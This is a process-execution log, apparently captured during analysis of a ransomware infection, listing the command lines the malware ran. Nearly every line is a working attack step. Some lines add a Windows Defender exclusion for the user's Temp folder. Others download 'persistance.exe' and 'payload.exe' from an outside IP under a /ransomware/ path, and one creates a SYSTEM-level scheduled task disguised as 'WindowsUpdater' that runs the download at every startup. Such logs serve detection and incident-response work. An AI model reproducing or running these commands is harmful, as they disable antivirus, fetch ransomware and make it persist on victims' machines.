schtasks.exe schtasks /QUERY /TN "WindowsUpdater"
2704cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp"
2752powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp"
2796cmd.exe C:\Windows\system32\cmd.exe /c curl -s 130.61.181.50/ransomware/persistance.exe > C:\Users\test22\AppData\Local\Temp\Update.exe
2988curl.exe curl -s 130.61.181.50/ransomware/persistance.exe
3032cmd.exe C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONSTART /RL HIGHEST /F /RU SYSTEM /TN "WindowsUpdater" /TR "C:\Users\test22\AppData\Local\Temp\Update.exe" 1>NUL 2>NUL
2076schtasks.exe SCHTASKS /CREATE /SC ONSTART /RL HIGHEST /F /RU SYSTEM /TN "WindowsUpdater" /TR "C:\Users\test22\AppData\Local\Temp\Update.exe"
2108cmd.exe C:\Windows\system32\cmd.exe /c curl -s 130.61.181.50/ransomware/payload.exe > C:\Users\test22\AppData\Local\Temp\Temp.exe
2168curl.exe curl -s 130.61.181.50/ransomware/payload.exe
2228